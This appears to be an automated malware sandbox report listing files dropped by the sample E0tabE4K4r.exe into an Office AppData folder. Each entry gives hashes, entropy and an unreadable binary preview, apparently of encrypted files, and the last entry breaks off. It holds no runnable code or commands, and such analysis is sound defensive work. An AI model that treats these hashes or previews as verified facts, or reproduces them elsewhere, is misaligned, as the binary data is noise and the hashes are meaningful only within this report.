                                                                                                                                                  Preview:<?xml..r;./..WK. .hWp..........~....esA.g....>.....m....a@....I;.x...eI).......&Q...7R..EZ............G..|...B..Q*R..".d.@..w.....>.....q..........;k..!.<Y.._.D......h.\%j..|....&.>.....f.y.......#b[D......b..P.E>..G.lf..g...!U.2....+b*)..ZH.K....[jkM<.........K...*$......Ki.....:.3.cn'.G'2N.r.....b..`......f... .P............Car.7...)..1.'_hf..=.Y.l../.........4..p....C....\.&s.s.Tl.e.TZ..MRp.*!K .......',..6..?.-.:..a...2*........G..../.5!......Z[.~..L3+....fOy^sT.+&../.._.i.W.^.6.,L.!_.....|...Tl.).-\g~2..J......!Z.<&..F.6..g..|..l....rh..c...5./....<..;..8.;f...:....Z..#..33^..`B...L...#h.S.....X.l........`.-.n..^;.u .>.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120666v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):807
                                                                                                                                                  Entropy (8bit):7.709988560039296
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:AdDmfE6U4SXbT+aoSoRGcPdbim5RB92bD:AdDME6UL+aodRGcpimcD
                                                                                                                                                  MD5:096D6D2EE9F9E7CD02DC1286F69F26CD
                                                                                                                                                  SHA1:5FE896B148E80A086AC9AF6DF64DEEBB2DE17057
                                                                                                                                                  SHA-256:E9CBB8391C6F3966A7338AB92E20F73D8A61244230C534F82E5F385497573013
                                                                                                                                                  SHA-512:4D40B29B218E4B40915D303390E1DE1000C89B9813C92A0634135A1E5FBBB0B7F572D62A672826653C0748A967939D6D996C33CFCF521360C837E4A85A8BE591
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml....x.....]....su.....#I.9.jd.*+2z.l.2.Z........OHP....k.............0...E.|..m.?o..Fl.N.HI.......3..".......;H...P......[.....l......j\@.....a...G...;[1..n.X..9ax.yH~s<b<:3XZ....K7aG..,..;.......o....R]...'\SDK......&....E.(.Sm.d.....X....._...Br..,uB?$y._m.Flb....\/96..L......H.'...I...#..A.....;..1......4.nC....U...A......!....s.q....O..!}.....p.`...**..v..2&|@..9...)....5.^.A.....sV^...~.] ...].h..:.....k.T...7.>.+..S..Y.a+;.. ..K.3....\.5B:....u.......T...._KXd8.....(...R#..n7y.:Mj..4..H .R.gd...9;P.L.......&f[......K..a..81u...y...".6Ev.....|d..o.}....W..Lq...V.jz..sY........nRs(.;.W.%IY.X).Q.c.Q._^.yK.+.....X...q.s.....L..T22.x.w...W..q...k.....o.....Q.......mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120667v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):741
                                                                                                                                                  Entropy (8bit):7.7146938040667745
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:LyMgsdL0lDfPI8H8SYfMG83sehHAkQHDxgiuS8Qk6OdLZTs0L9VFSUdNcii9a:uWR0lDob83ZOjxnuSM1LR5L3o2bD
                                                                                                                                                  MD5:998791E48E8D9E95B9B4232362DE8F01
                                                                                                                                                  SHA1:FF9DB381CB541122D1E9A7AD6B3AA8F5BDF7B24E
                                                                                                                                                  SHA-256:FDB2C63D4E086A69148BB8A32F5D19D50F1BCCF8E609D4FFC796FED2991B3839
                                                                                                                                                  SHA-512:0868CC0C59636177A9E4EF7126546EDD6866A75B9ED732D1BB5D902D2AF9E68DE6DE367196824731C3471D9DAA7F23EAE2F2CBE2AB031E9C9E1110069556928D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlJxf.>.Y..S..X..>i.....!.t...n,.w.....A?..3EZ.T|.B.~.1..P......}..h.I..*...h..tM'....,..:|...ZD../..9.......R..1...../Z..,.....(....1...D..%.O.4f.R;..9...'.+..!)i-1.rC..."...J.......m......45.o..Pc.]..N%^fb~......PPu......%K.N....fX.n).7..wD..i........?.v.b.WD..,.<.aw.,..#...R.K.z.#...;.......H..d....&k..G...0.1y?.Q..Y."..h`...w.z~$.dy..MJVQ..Bd..q8....S".<..-.....0g....'......eQ.."z.....r.....C... v2.]...:.v..c...Yk..watc.`..k.7..xtI.5..`n.y..Q,.i.........z.rn&...:IIq....6.:^.9iA.W,Y......jgo...QN...x..f..\..>i..Q%i....{..O.pd....Z>.X..X.(..R......E...-]=.1@ ..J;.h.........w!>(.I....j{.+$f..mfPp... ......#A...*7..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120668v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):802
                                                                                                                                                  Entropy (8bit):7.729142231865866
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:8zfwa5IiR+89kpA3E/SJ+KTCFlZ2TAV2bD:XcRPapABJ+KTZZD
                                                                                                                                                  MD5:D33B2811BD357376A05B743021A4CFB4
                                                                                                                                                  SHA1:779FF2EC0460FFA2C4558D4A50C8A30039925763
                                                                                                                                                  SHA-256:047B07002E40168CC969A4C1C210935B47AF1CB7ABEBE2A55EB7D5B9EA90BDE9
                                                                                                                                                  SHA-512:E913FA3B62183889D6BE11FA270388AB9E943CAE4F6E02B075832BECBE74F3E3899BC679BD274CF181482C20E2362A492BCA0C070CA9A7B50B94BE0D9C4283E3
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml,.-.H.BE....,#..1.MZ#.#...............!....n.T..xA.uT.U....3!@..!.*..'.g.f$...1[H.a`...W.8...../......M..<.....d..L..m.'>.s})).._x2.j....8.,.kM..E)J...p....:A"....o.L2....w.~.....O../S:.R=.......N.&]V....x......M..9_.8p??..L...._...*..<(....x#=.Zj......g...f.dn].B....C.W.l............".6......}%E.#.V...OA..=...PX...jB..l..u......@>......J5.%5....^..U.#e.hGp...mw...Y.x5..fI`....9.y....h..?q>...y..t......{.ap.c..I...h\.1/b...Q0t.k..#.....=$?..<......>2..R. ..+=.......Q$M..N.>..{.I.j.|...Q...[a..a..._..........6?.!Yz~.V?...jC.....u._.~v.*....*.}(......%......-...V......Q..-y).xQ..W....`....-...T...f....U.::...F..9..)$..&..T7.......R.Z....8../...o.....U~..x...$xO`G......g.bmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120669v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):749
                                                                                                                                                  Entropy (8bit):7.757987587657848
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:gJ7co4wZS3xXNhH7GezhyaSStbTR+1dJ170agpVF7KJc2DFU0SUdNcii9a:gJ7cNwZSRNhKZ+R4JTgh7KJc2xY2bD
                                                                                                                                                  MD5:810F76D9EE2358AC6143690E57B114C1
                                                                                                                                                  SHA1:A0EDB612F00B3777217DD34BC93CD49E49485CC2
                                                                                                                                                  SHA-256:D37965379AB3D5D49D269F57356AB0FAA3AF627554ADA2C7E9E42ED6B615CE54
                                                                                                                                                  SHA-512:7BDA7BB9CBEF72945B66C0D928ACC84B4442E0BF4EDD1381D6AF67C735F6FA268F9F8EAD333BCE1B125712C51D506672759CDC6D0FC7DDAE8A2FC4715D2F3E52
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.......&.]...IxgL..}..Q.......f.....w.h..r...*..?....t..)h....?.i...;;?J.s...E..i.K..R..z\U.Q...6v....+.=.....2@....>.?.....i.1....b......$..Wi..(rn..hu*X....[.z....m../..=[..n.*.|+.r..L]Z.}....i.N.d...+.A..t..;...U4.....1c,Hf.3x..<V.M.2...?..J+t.(mp../4...q?....g.N`..:.R".6.l'.$.#..,.m..aPMk.9...~........-.f.."...q.h.vY....LF.-h...m..D.......0.W..%6..q.J.._..X....WF.La..._..m.|...y....!..+).3../:...e9..E........>.....n#E..0..E.>...05Z.Tn......DS .?y..Q..m...s..Q....3.....g.]zk.q~........5$......<r...0:...3......p..B..\.+_..y..\.z_..S.5.Js.bNN..1..I.h}#D...8....-.'...~.'.#..z......h .<-..q.lTTS.F...a...c.O^.{.)......f....?mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120670v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):805
                                                                                                                                                  Entropy (8bit):7.7093887767104246
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:Rub94Yj3AJ/w62T2Nu/jcuzwrbhdsqno2bD:RuiYzAJ/wASJbMD
                                                                                                                                                  MD5:308B48241782592375EDF9D0ED02C1C4
                                                                                                                                                  SHA1:2A2070D886C213AC7C68841F213497315E518D28
                                                                                                                                                  SHA-256:09300FDDE90CC42FB55A58C6B342D148465E6479E81544719B1E93FEED1C9DED
                                                                                                                                                  SHA-512:8AD0F122F704516DBC0BF5CE0837D03AF9756A8B761B5F46AA7F4E901C4C7FBCB9B85F58A8E58343AD7263E6217D407B25BA777293B6FD8B2377B3E2712F5640
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml...{.~.)....>......m.fR..3...`..z......6.RH.B`.d.hY.Z..Dx{j...|.9.?fO>.?~T?+..V.c.+8.U.F.B,..t.8C..lF2...>.|.V..T..1\.... ..SSj.*5.(.K....A.&.{.kqu..u+.sV..`$[.........h.%......oe........YZ&....L+....a...V.s.....7...q.3.1d.....Br....A....`aO..o9%./.e#c...5.XN.cB..H..+/.q....e,O......<C.............@..:.t.r...r..L..Ms.n.g..5..m.i..CJ.#...7..g..^.X+.Zg.@.......M..V.m\......r..rd.x.JZ5......D..;..h6..jq.:3...c6..@..^+6...Sa.<.....n....5G9..B...F..Pgj...w,.}y.W".'G.H.....#Fl....0...M+.*x.....H......2....f5..9l..?9?S$;z}.S.y.Z....>V Z_K7....!,.(.........#...W.?!...7_.vg.{.Sr.h^.~..B..O}l.|.7.W...Q..2F...K....2...}....@h..]..R..cL;N?.:B.-.a...m]M.#.e..X..<+...C.e.a.t...............5.[..c.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120671v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):765
                                                                                                                                                  Entropy (8bit):7.718134936481889
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:w1ur1mmBBlrc21rB4NBLrpboQ3qF3FdvvyPS2KwzHfSUaFP9Ei9pL8GSUdNcii9a:RhFPlVd+NJr1oQ3qxePSAfVaHpi2bD
                                                                                                                                                  MD5:E0004CA5A41D8B5F2B23971A329BF6F0
                                                                                                                                                  SHA1:8BB7DC8479DBF335C6433B1C67E74A88982C349D
                                                                                                                                                  SHA-256:C16D87C5AF40DC749097E75338304ACEA31A27191C01129AA5083128070BD37C
                                                                                                                                                  SHA-512:29AED4882B76FBFD5A84CCE7713BDD87537F8ACCDD8D51431A0C487C634DA23B8AF00E3F1AAB34F00C4437A3F49FA1BA140065591A9CA9A57BA9E7D93CAD4473
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlK}kB8...'....P..E..f.K-....lw....?F..K....h..aW2.........3WC6.....SG\,Ip.yo..0..i.....H}.<.mV...wX.../...N.xm.......;h'...P.....G..a.s..l7n.D...'&...Pa:J...1b.o.t....*r....K.d...%.......7.R%.W..t.4.....j..f{..)N..(..}U..8...qe83.pd.zM...J............g..!........\..c.E............FX....{...T|X,..O..I.#:z.(7F.I.X ......XW&..T....7xb#....ME[{.....0...MZ..9.H_W._}L......P..NZ..F%.dq.>tj..Q..UC.....3.R`.Z..L.U.xD....wl7.5..vY....U...z..N.t..P...A......!P.2..o..L.K-~y...b..X..B...I.%....Mm5.#.U.......&<>..Cd....U.d....#....g......5a...-.j.2OM/.+..n{.].=E...(bG........a..(G...Gz...'..S..-F...`i&...h._.x.h.....R../M...f=.ab9.wZ.p....[-.*P2\mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120672v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):808
                                                                                                                                                  Entropy (8bit):7.712876762304132
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:+QuaQ8nwZuBR6vcNOsO47bO9MINwfrVQDWXDLdng8c0lb0Rzuq0VMSUdNcii9a:+QZhBcvQOzMAwrVJDpng8c0lb05uN2bD
                                                                                                                                                  MD5:325D420DB6609F4D92AB7710361F4C0C
                                                                                                                                                  SHA1:08486085E79724AB046D5B9DF61B0149F38C4B2E
                                                                                                                                                  SHA-256:0AA67062334D5BCCD7B2415A416FC40F849329DE27AA17250DF1CC521353DBE0
                                                                                                                                                  SHA-512:1087439B91336C4CE9C227503B8493D33375ACFFA8A3BD179F378455C22B2FAA85F4BB698D28B110D626BF327DF030FD97D4E44FFA6D36E74A37C8EB399D6459
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.F....8.A4).......$.2...Z.-.(...m1....!..Y.;.OYc.83.`...Yx.j....s....9f.+._<..TR.B.D......;^....OD,.1.nPu. ..7.h...E..7^^j..O....W0...n.E6.yDJ.. ..V.M.B'3.+..~j......c..a.E..@......J]/.....=\.........2/d.../...}G.-(. ._.e._....P?\...M..L...a.Bh1..g.../..... .I$,.d....5L..~RC.^..(..]....e.l........5...l./.,{v..A..`.y..do.@...D?.u.mA...5..W.C1.....B....S.QO..q.>H.8...[...K%..L.O}..t..2."..m.@/.xP..&*...3J..2.9.a..-.1?O.U3]&....&G.O.LX......?..w..?...T..?.).z..w.{.N...Pv..6....A.M..%P)..<mQEX}Y........M....v......;@8u..X...s...Csv...f1.5.....n.y..Gb.K..'NSHu.i.+.<q.!......f..............5.Cy.6..j..%(..+6:.v......#.'.>...q..|.j/.g.6Z.!....Ve..J.'n..4_......8.....5......._;....m...mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120673v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):760
                                                                                                                                                  Entropy (8bit):7.757945756515507
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:OzhcPcbaNyPAU8KKYFbsAblePyshtjF/LRresEVk4UyhQal2XftleWSUdNcii9a:4cP2a6AUkyYF7tjFTRKsE2pyqal2XftF
                                                                                                                                                  MD5:EEF3B1916BADE60331A9564B0146C74B
                                                                                                                                                  SHA1:C6861727242FB7DE3D3C8A302582F7EB70C08581
                                                                                                                                                  SHA-256:F5B6403E6828481BAB9CEF61B70371B93A38EB0BE51A797E5DCD14D0A062A826
                                                                                                                                                  SHA-512:853FC0CEBF7A42EC2A900747C020E9F298E94F7380C7AE6DC8699A97A4B9A21317322B20C0483A7D52202D44BE8621396B07D9D453716E8EE98B9421815D452F
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..4pf..p..~cd.....D.*..T....>..P.....n .91.......`.T..g..|.lu.P...~<5.G....S.S..gCI.B..s...XN.s.d..,..[..+.r..`I..y..E..q.J. .*< w`.-..L.....'[."nab.......~F.g..>x...SZx.I.d.N.e.u..y..[.F.Q..........1..hAHY.t.d...7T8..t.@......d......'....J.^:..y2U.)j..+...C...RM..#......a0Z. ...L..+!.q....P...^.%.2....\..i..}y.....l.C....NsBU....S...:4.T.^....l.\....E....G..ti.....E.....f..$....e(..........S.....n...b.FZ=.Z...q.i.....)........X...M...%g.....9,.w..h...%.p...J...F...Q..Ng...&...R....0K..1.j.l..f.i........."..|Kh_qE.rw5...`.oK....(o...$.P....".._.J.....z....0T...$"...Qe..\)..4......J.....1>..R...(~u..t..[9..#.....r9`c...K_/9}..I...<....kj!..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120674v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):807
                                                                                                                                                  Entropy (8bit):7.70855277246155
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:aDXVO6+C1rDhWr/KPdJfFwYGPMYizwrWWnoqJjvL2bD:aDX31ZwKVJizPJlBzxv4D
                                                                                                                                                  MD5:19CEEFAA7531CF3521BA1DCDB40EA4DB
                                                                                                                                                  SHA1:2A2B4735DDF766F01CD8526752233A981B7C2E52
                                                                                                                                                  SHA-256:D2B4F3AA47CBC4F7345804F9A733D2F4BA18CB2544B6435C67D417498FD46099
                                                                                                                                                  SHA-512:1DD981EEA62A40A189E68AEE9250E8B84773BF2FEFA5EC295ECFE1A0695A3802479E962191E55CB394A49CA272CCD973500668EEF0DB726DF3079153C6EBAEC6
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlS..1.[....|..*.^c...l...8.u...4.Q....0.....].. [#...4.oq..;*qr.1..8...i.z.Q.. ..>...'..Y).Rt.v$..T..e...(.J.....%.........:.h....g.S.._2.......3.h..S.]..N..v[.`f6....0....A....{Bl.Q:.f..\$...H.Z.t..DP.&LR........"...@....@...s...MY).G......y^....LMN.V.$...54..:Ba..,e..'.[I&.#..R.Q..L.f..>NAIx.p*l2D_.9..d#._'..........+#..!.N..O.;.w$..b6..[...d.*.:h=....H..[.|o.....d....W..On......1_..4r.r.....UWvP...5_..8/....K.M.+8a.lM2k.3.|..k.(....Q....7...P.9......F...J1..g..g...k.[.-...*.4>.~....j:.o.x...B..0....>.._^.x....}..gI...4.....N....t..T.5..9...W......C.......B.#..L.Axck..@..Qf.x.vj.;...8<1..k.D.",.W..;d=.H..R*.[.l+..n...e..04.........\.[Va:Ll...=#.i'.>..z.mxe.....Pg....)..F..N...'!....Jm..#.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120675v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):752
                                                                                                                                                  Entropy (8bit):7.706041785928904
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:QlXGlCD03mhWaganWAcw5NUfQkRtECPDD6BC40iN6BmxTrhzJxSUdNcii9a:Q503mRgRHftPDmC4Z6B+Tlzi2bD
                                                                                                                                                  MD5:46D3590208EDC4D41C78BB176C0EC4A9
                                                                                                                                                  SHA1:FBD6A87A24493D8AC08CE31B9289F6BF90204C4F
                                                                                                                                                  SHA-256:99D662001A6AF7CF6A2EFDB3E2B6EC3D0980E66CD5C09EC93A52421341C6EFF3
                                                                                                                                                  SHA-512:BCD9D4D9D447F78A5613D075810EC5A59B714C3A42EA3481040D4BE6F2F612955BEC51A3B66F90BEE0BA03C8EC5725550CBB387C398DE0E2BE9BF260114AE538
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.....m.2h...k.[...$..T-..h.c?.'.....MD $h....x.b..3..0.V..@.}_.az.A>.PVf.k=P..e....Q.x$.......sF....O...C.]...........hl.]6...er.M....L.`1.!....?..0....0b..L..n......z([\...HhD..*....9s..6X...x(....Wv.=...F..B@.4+@.....Z>.u....9.4../._.H@.uc^."p.A.H.+5....r.....U.D........k..z..V..O.xR.b{..J.7....W.!.x.J.R..$.A...............KPO.. ..u...i...].....kf..h..S..)08{rblX...y.w....w,.Z.J....a.....J..>LB.\#..........WA.wG.,.O.'.....=C...4x......4_.."Q.f.69.K.3.u...i,c.b.._-b.7.$.0..n."'....\Is.RC..R.4..Q.X.N.....)a."Q#5v.....(.jA......}.7...V....cp[.<.K..A..!.........M.Hn......L%...2~...:..NjM7,.J.....43.N....b...SQAUz..*..n.u.*...mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120676v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):805
                                                                                                                                                  Entropy (8bit):7.703044246804158
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:zWz3kZZLPvPQPt8/Sv1GM1+x6BU/AmdED1BWSpF57ojjWGUQRjdpMsSUdNcii9a:z7LP6t2SAMq6BUYdX6UYvS2bD
                                                                                                                                                  MD5:0BF7040F464835CC494542DEF96BD450
                                                                                                                                                  SHA1:82640E11CE9DDFB888B9E3C5002B81F1E66C6264
                                                                                                                                                  SHA-256:DB9EC854FD0620327182B5A9FF0CE710F8491FB624AB4DB65662553FF312323B
                                                                                                                                                  SHA-512:B7EB8816483ADBA30B01A44144A7D46013D0C1B54B271D980CCF5668F031146E9E8F8D46C0F7179D481DEC9471A15454E46EFEAC731E7715A3548C18B712D435
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..k.CR.%.sbe..Q...V#R-..A.$7.Y.?@.. ..L%4..g.," .p|.....}......C.;...M....Pm..I.)u...`.A......H...,+.....'.....P.......r.k....6.&.$C.Z.N..l..R.s._.....^9.>.e..7...'b.._....7.lNlHNW..S.E.,9..5...}$S$.....v....GQ..>...d..T;|.........qQ.;..x.Z~...b)~K.....Z....l~..s..sK."lZ*.....oXC..j...>..lZ\..k.i!SH.at0..+b.,..M)X.V3..R.........^1....w..i......a$/.....Q..v.W......6'..]P.a...'..II]D..<....y....xC.A.).Z"...&[.Bk..Ya2...N.bI....+.`..w#O..rB..uyB..u..].7..$.c..B+.%...]9...s"A.@/..!..[..\.....%u..yeM.....s^d.Q..;......7}.F;.fn.........)3.c.dOR.j(....}n.hl.h...`..j<=....._!...fv..#r......./Ufp.+..!..BD........2&..=...J.p.=.........`.M.9...`ZJ.7....U.HB...v..!.Z.,../A...`......N6.....mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120677v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):738
                                                                                                                                                  Entropy (8bit):7.728444484774519
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:30BZjSCInubJ7XEKKW2zsxezmAOajKg6NIJOJs11ne5SUdNcii9a:3kZj3PF70KKWWsHrazaIAJsjneM2bD
                                                                                                                                                  MD5:0B21A93F91DECBCB675A96BFFF682390
                                                                                                                                                  SHA1:F00CAD9A2AEE5E1666DFA8F3151DCA2684BAB732
                                                                                                                                                  SHA-256:68805E382B8F79636373A197F8AC268C8765F210ECAFC79CB9494FA06DF0C35C
                                                                                                                                                  SHA-512:57E1EB4A8C82F84886EF6E12A3C82DD0139FCCE4EDD4ADE36505B9B0392D588198E146B7D514BC2077FC7D88BA1A42660952820248211DD3C1BFEE676FC27505
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml....Q..a}b.@......%4..t...E."[..'"..-.x.yY7...e%k.....M..jL.kqt...._(...ak..?...J.a.m.\.C..*....].U...hz?..=.......&b....b..j_..!vEt.=...n....X..R....n..X.ACj...l9..*....[.a0.........I..(.....OX7....._..!bc4..1;.X.$.[$Q..&.^.O..|w.......1................*.%...o.....N...9.).x.......W.".m.)H...<U{....ex...)..E.v..<.f..T..?.m...SP...d..6...||-.UW..z8lPD.g..z...[8wON..o.T8Y.....@....6K.mh@C.@.A.).-..,..e..d..x.#...m..J...5..8....31...).....j|.j..>......Z..O...$..+!.>......>I.Py.".F.9...{#pe.[...I......$...o..F5..w....kL.&...tL.....Y...H.*....*.......W.+,.aPi....2.<..7)..TAPj]~.......T.n=o1.r........".:......0.....'mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120678v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):801
                                                                                                                                                  Entropy (8bit):7.718682041761938
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:Qz/+xzfobkrULeIwmV1bGrBFgJo8vpLSIonZN5K02bD:0/QoArUNmdSpsNMHD
                                                                                                                                                  MD5:3A8E1AE53E203DA44966FA667192E9A2
                                                                                                                                                  SHA1:58821020057D54B840471ED8F76580B922AB5F14
                                                                                                                                                  SHA-256:3770C849503EB19C733AA0A2B5B42C4BECAC7E384607164C68791831864A5D0E
                                                                                                                                                  SHA-512:7ACF81804189191407AC69CD08619CD8FE21BFD3282F7E047E03CB96FAFB263211D75685771822489B68FBF2059DF97D0A6A2919D5D8F98B8835261051C1CE45
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml$..\.f.83yvw....H.a8..C...1...a.g.......<wZ.".cdwU.,T*...lr....D`k.8......r..~..^D.O"...<...S4......./........B.W.1St...O_1..\0.........YH .(RG2...f..L.."p4.-..i...y.4s..B.*.`..%4g...9.r'.\. 5p....S.....f 3q*..{A.u!..S.;...RmU.X.o(...f.....(......?...Z....[."7D.{..u.Azx".#...s..............;..#.f..9v.P..I.."g.5#......~.]...Wa..Eb..".8.T..DI.......?..:..Xu..gT.0.k.G..:."....j..X..<?..|.....wx1A...~. .p%...t.....h........t..!5...6w.&.r...R@7.p..E.......$...m......v.....@u.S.\.%..+$eS.......R.....h.../[.=..'.x..%...g. .....A0.....W.....;.Ay.e...4..d..#....<].]S..l92a}.!.@....yB2.)/U;....OB>....5...e....?.I^.B@G../%.'....P.....`;WxD.%..T..L.+..]6..<.o.'].........b.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120679v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):507
                                                                                                                                                  Entropy (8bit):7.575861010255446
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:nIGN4BcbPXkdSmyokC1HRopnwQc6SR9lWT8FcL4DZBUwSUdNcii9a:IGN4B2kVtVpR6SfnFO4D/Un2bD
                                                                                                                                                  MD5:67B369C1622BC3197AB09ECDCE1FA24E
                                                                                                                                                  SHA1:1E73DE26210DF459333C54DF5BC2E816C5580844
                                                                                                                                                  SHA-256:9B011EECB14D7F819F4A0E4400D81F0EF032CE8860C92089FF1033048B02D63C
